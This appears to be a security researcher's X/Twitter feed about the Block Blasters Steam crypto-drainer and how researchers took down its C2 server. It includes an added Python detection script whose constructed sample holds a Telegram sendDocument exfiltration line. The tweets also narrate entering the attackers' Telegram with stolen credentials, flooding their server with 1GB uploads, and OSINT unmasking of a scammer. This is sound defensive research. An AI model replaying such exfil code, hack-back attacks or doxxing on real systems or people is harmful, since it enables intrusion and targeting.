Security researcher Signal: x19.89

Joined September 2025
Pinned Tweet
The full technical report details how we took down the C2 infrastructure of Block Blasters drainer malware that @valvesoftware allowed on their platform. We spoke to the threat actors who had no remorse for stealing from a terminally ill cancer patient docs.google.com/document/d/1…
This has been well documented as being exploited in the past. However, it is still being used to target individuals and the developers have still not added mitigations or appropriate warnings.
PSA: Terraria mods in tModLoader allow for arbitrary code execution. Unsolicited invites to servers with auto mod downloads should be treated as malware. Unfortunately threat actors have already exploited this. This is not an easy fix for developers. Technical report will follow
If you had your crypto stolen and your account compromised to spread the malware by the threat actors behind Block Blaster, Chemia and PirateFi, please DM me with the amount stolen and addresses. Also export all of the data from those accounts if possible. Thanks ♥️
People are asking how the OSINT nerds found the guy that drained the cancer bro. Well, it's very shrimple.

The shitty malware sent all the stolen data to a Telegram the scammers made. We connected to the Telegram channel using the same credentials that were inside of the shitty malware. Inside the channel was the scammer(s). We got their Telegram IDs.

OSINT nerds used their Telegram IDs to see if they were in any other public facing chatrooms. One of the scammers in there was in several fraud chatrooms. He advertised looking for a video game programmer to make a basic 2D game. He also advertised needing help with some malware stuff. In a different chatroom he talked about how much he likes skateboarding. In a different channel he shared his Instagram and was sharing photos of himself next to expensive cars.

Then, OSINT nerds looked at his Instagram which had a LinkTree. His LinkTree linked to literally everything about the guy including his YouTube, PayPal, Kick, Twitter, etc.

So either he is a master of disguise, and ran a year long detrace campaign to throw off OSINT nerds in the event he's caught scamming. Or alternatively, he wasn't aware public Telegram chatrooms are public and could be searched easily.
Compiled list of steam users affected by "BlockBlasters" crypto drainer compiled from all the server logs the attackers left exposed publicly on their webserver. In depth victim data can be provided to correct agencies. (Parts removed for victim privacy) pastebin.com/iLd4PJnn
Hello, I've received a bunch of notifications today about the "Block Blaster" ... pseudo-takedown that occurred in response to a group of individuals spearphishing and cryptodraining a cancer patient. I appreciate everyone thanking me or giving me a congratulations. I am not fully responsible for the actions which occurred. I did reverse engineer the malware and identify infrastructure, however any work done was accelerated due to a group of people. When I announced I was going to look at the video game closer to determine if it was malware (it was malware), a person contacted me and spun up a group of like-minded people interested in examining Block Blaster closer.

Here are the cool and badass people I worked with:
- @zachxbt
- @John5725424446
- @andreee_eeeeee
- @escrow_
- @C4L38
- @defidownsin
- "J"
- Random nerds who provided "tips" to us

I've never really spoken with these people before, omit ZachXBT, but each of us was angry from what we had seen.

Before I get off for the evening I want to note that I am uploading Block Blaster to the malware library. "./Samples/Families/Block Blaster" I have also synced all samples in Triage and VirusTotal if you want to examine them closer. I noted the SHA256 hashes in a previous post.
Thanks to the boys: @andreee_eeeeee @vxunderground @escrow_ @C4L38 @DeFiDownsin @asdfxzqwertz for all your efforts <3 and especially to @rastalandTV for being awesome and showing just how strong of a person he is.
tl;dr of today
> @rastalandTV gets crypto drained
> he has stage 4 cancer
> he's targeted specifically for his cancer treatment money
> loses $32,000
> nerds band together
> @ZssBecker donates $30,000 to him
> malware nerds come together
> drainer infra found
> pull all victim data from infra
> victims will be notified
> all malware flagged
> OSINT nerds come together
> find drainers info from their telegram ids
> find info from their steam ids

tl;dr tl;dr
stage 4 cancer bro gets fucked over, 50+ nerds band together to undo the damage
fuck cancer
This is the first batch file; there's another inside a password protected 7z file inside the game files.
4 -> The main channel administrator is this individual who enjoys stealing from cancer patients. I hope somebody like @zachxbt is able to find you, and you have to live your life being publicly shamed that you stole from a stage 4 cancer patient.
3 -> Given they had exposed their Telegram bot's source code, we were able to enter their Telegram channel and get a list of the administrators in the channel. Their bot allowed them to whitelist and target specific users in their whitelist, some of which I'll attach.
2 -> The C2 allowed for arbitrary file upload (courtesy of ChatGPT's poor security), which we obviously took advantage of by uploading a series of 1GB files, eventually taking down the python3 SimpleHTTP server running.
1 -> A group of fellow researchers and I have managed to stop the spread of this stealer distributed on a Steam game called Block Blasters. The C2 infrastructure was open along with infection logs, which @rastalandTV is unfortunately located in.
A pump.fun streamer that I've known for years, @rastalandTV, who has stage 4 cancer, got his creator fees drained by downloading a Steam game (which turned out to be malicious even though it was on Steam). I'm not saying buy the coin right now because the hacker has access to the wallet and will get the funds. But once we get him sorted with a CTO on a secure wallet, it would be great if people could show support. I'm going to be playing CS2 with him sometime this week on stream if he has the energy. Over 30k was stolen, which was supposed to be for his treatment. It's disgusting that people like this exist, but there's nothing that can be done about that now. Don't send anything to the SOL wallet on his profile yet either because it's the same one that is compromised. I'm confident that he will have the volume to make back what he lost, but the best thing to do right now is to support him/watch his streams when this is resolved. Hopefully, someone on the pumpfun team has enough empathy to get him some attention. @pumpdotfun @a1lon9
Dawg, why did these cryptodrainer nerds leave their Telegram credentials exposed in plain text in their drainer?
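The post above turns on the drainer carrying its Telegram exfiltration credentials in plaintext. As an added triage example (not code from the researcher or from the malware), the script below scans a raw sample for the documented Telegram bot token shape, Bot API URLs and chat ids, and redacts the token secret so the indicators can be shared in a report; the embedded sample bytes are constructed, not a real dropper.

```python
import re
from typing import Dict, List

# Telegram Bot API tokens look like <numeric bot id>:<35-char secret>.
# The length and character class follow the documented token format;
# the bot id length range is an assumption covering ids seen in practice.
BOT_TOKEN_RE = re.compile(rb"(\d{8,12}):([A-Za-z0-9_-]{35})")
API_URL_RE = re.compile(rb"https?://api\.telegram\.org/bot[^\s\"'\x00)]*")
CHAT_ID_RE = re.compile(rb"chat_id['\"=:\s]+(-?\d{6,14})")


def extract_telegram_indicators(blob: bytes) -> Dict[str, List[str]]:
    """Pull Telegram exfil indicators out of a raw sample.

    Returns bot ids (the non-secret half of each token), tokens with the
    secret masked, Bot API URLs and chat ids. Masking keeps a live
    credential out of any report built from this output.
    """
    bot_ids, tokens = set(), []
    for bot_id, secret in BOT_TOKEN_RE.findall(blob):
        bot_ids.add(bot_id.decode())
        masked = bot_id.decode() + ":" + secret[:4].decode() + "*" * 31
        if masked not in tokens:
            tokens.append(masked)
    urls = sorted({m.decode(errors="replace") for m in API_URL_RE.findall(blob)})
    chat_ids = sorted({m.decode() for m in CHAT_ID_RE.findall(blob)})
    return {"bot_ids": sorted(bot_ids), "tokens_redacted": tokens,
            "api_urls": urls, "chat_ids": chat_ids}


def looks_like_telegram_exfil(blob: bytes) -> bool:
    """True when the sample embeds a bot token or a Bot API endpoint."""
    found = extract_telegram_indicators(blob)
    return bool(found["tokens_redacted"] or found["api_urls"])


# Constructed stand-in for a dropped stealer script; not a real sample.
SAMPLE = (
    b"MZ\x90\x00...constructed junk...\x00"
    b"TOKEN = '123456789:AAH" + b"x" * 32 + b"'\x00"
    b"requests.post('https://api.telegram.org/bot' + TOKEN + '/sendDocument', "
    b"data={'chat_id': -1001234567890})\x00"
)

if __name__ == "__main__":
    for key, values in extract_telegram_indicators(SAMPLE).items():
        print(f"{key}: {values}")
```

The same scan runs unchanged over an unpacked batch file, a Python script or a PE image, since it works on raw bytes rather than parsed strings.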
Yesterday a video game streamer named @rastalandTV inadvertently livestreamed themselves being a victim of a cryptodraining campaign. This particular spearphishing campaign is extraordinarily heinous because RastaLand is suffering from Stage-4 Sarcoma and is actively seeking donations for their cancer treatment. They lost $30,000 of the money which was designated for their cancer treatment. In the steam clip their friend tries to console them while they cry out, "I am broken now." They were contacted by an unknown person who requested they play their video game demo (downloadable from Steam). In exchange for RastaLand playing their video game demo on stream, they would financially compensate them. Unfortunately, the Steam game was actually a cryptodrainer masquerading as a legitimate video game.